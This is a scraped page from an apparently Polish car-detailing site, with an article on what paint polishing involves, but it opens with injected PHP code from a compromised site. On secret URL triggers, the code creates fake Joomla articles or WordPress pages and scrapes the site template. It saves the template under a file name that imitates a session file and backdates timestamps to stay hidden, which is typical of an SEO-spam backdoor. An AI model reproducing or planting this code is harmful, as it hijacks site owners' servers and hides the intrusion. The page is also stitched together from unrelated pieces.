if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } NA CZYM POLEGA POLEROWANIE
Pobierz aplikacj Autopilot

Nowe

Forum

Brak postów do wyświetlenia.

NA CZYM POLEGA POLEROWANIE  Email
Ocena użytkowników: / 2
SłabyŚwietny 
Akademia Autodetailingu - RENOWACJA LAKIERU - KOREKTA LAKIERU WSTĘP

Polerowanie jest procesem mającym na celu całkowite lub częściowe usunięcie defektów występujących na powierzchni powłoki lakierniczej, a także zwiększenie lub nadanie jej utraconego połysku. Ponadto jest czynnością właściwie przygotowującą lakier do zabezpieczenia go za pomocą woskowania, nałożenia sealantulub zdobywającego coraz większą popularność glass coatingu. Należy tutaj zaznaczyć, że samo polerowanie nie zapewni powłoce lakierniczej ochrony przed czynnikami zewnętrznymi. Podobnie po nałożeniu wosku lub sealantu na niepolerowaną powierzchnię, nie uzyska się jej idealnego wyglądu, a jej defekty zostaną jedynie lekko zakamuflowane. Wniosek jest taki, że te dwie czynności są całkowicie oddzielnymi procesami podczas pielęgnacji samochodu i obie są niezbędne dla uzyskania najlepszych możliwych efektów wizualnych oraz praktycznych.

Zanim jednak przystąpimy do polerowania, powinniśmy odpowiednio przygotować powierzchnię, na której przyjdzie nam pracować. Dla zapewnienia właściwego przebiegu całego procesu, konieczne jest usunięcie wszelkich zanieczyszczeńzalegających na karoserii samochodu. Gdy to uczynimy, przystępujemy do inspekcji lakieru mającej na celu dobór odpowiednich produktów i technik pracy. Są dwa sposoby polerowania powierzchni – ręczne oraz maszynowe. W pierwszym z nich stosuje się wodne papiery ścierne, mające na celu usunięcie głębszych defektów (czasami jest to konieczne przed przystąpieniem do polerowania maszynowego), a także kombinacje past i padów do użytku manualnego. Metoda ta ma swoje wady i zalety. Uciążliwy jest przede wszystkim czas i nakład pracy potrzebny do uzyskania odpowiednich rezultatów. Jednak może to być zarazem zaletą, ponieważ tym sposobem trudniej jest uszkodzić powłokę lakierniczą. Podczas polerowania maszynowego powierzchnia zdecydowanie szybciej się nagrzewa oraz następuje szybsza niwelacja warstwy lakieru. Dla osób bez odpowiedniego doświadczenia nie jest zalecane polerowanie maszynowe, gdyż niewłaściwie przeprowadzony proces może prowadzić do trwałych uszkodzeń. W takim wypadku sugerujemy skorzystać z profesjonalnych salonów estetyki samochodowej lub ćwiczyć na mało widocznych powierzchniach i pojedynczych elementach takich jak zakupiona, używana, stara maska samochodowa. W ten sposób można sprawdzić swoje umiejętności i wyrobić odpowiednie nawyki. Właściwe użytkowanie maszyny polerskiej skutkuje zdecydowanie lepszymi efektami przy znacznie krótszym czasie pracy.

Uszkodzenia, które możliwe są do usunięcia podczas polerowania, w większości przypadków należą do defektów wierzchniej, bezbarwnej warstwy powłoki lakierniczej (wyjątkiem są tutaj powierzchnie malowane bez użycia lakierów bezbarwnych oraz nielakierowane elementy metalowe lub z tworzyw sztucznych). Należą do nich tzw. „koliste” zarysowania, zadrapania, wżery spowodowane oddziaływaniem kwasów (kwaśne deszcze, ptasie odchody, szczątki owadów), nierówności, utlenienia czy też plamy i mineralne osady po twardej wodzie. Skuteczność polerowania zależy od wielu czynników. Znaczenie mają tutaj użyte produkty i narzędzia, stosowana technika, stan lakieru (jego grubość, twardość) oraz rodzaj uszkodzeń (głębokie, płytkie, rozległe czy punktowe). Należy jednak pamiętać, że nie wszystkie defekty są możliwe do usunięcia. Szczególnie, jeśli są one na tyle głębokie, że sięgają do niższych warstw powłoki lakierniczej (np. odpryski po kamieniach, głębokie rysy i wżery, pęknięcia), a także, jeśli są bezpośrednio związane z niższymi partiami lakieru (rozwarstwienia, prześwity podkładu, niedoskonałości warstwy pigmentacyjnej).

Czasami chęć usunięcia głębokich defektów lub praca na cienkiej warstwie lakieru, mogą wiązać się z możliwością uszkodzenia jego powłoki (przebicie się do warstwy koloru lub zbytnie osłabienie prowadzące w przyszłości do rozwarstwień) poprzez zbyt dużą jego niwelację. W takich wypadkach powinno się zdecydować na maskowanie uszkodzeń zamiast ich usunięcia. Można w tym celu użyć delikatnych środków ściernych, mających na celu jedynie zaokrąglenie krawędzi defektów, a także produktów zawierających wypełniacze. Nie da to idealnego efektu, jednak tymczasowo zapewni nieco lepszy wygląd lakieru.

 
Platnosci obsluguje PAUYU.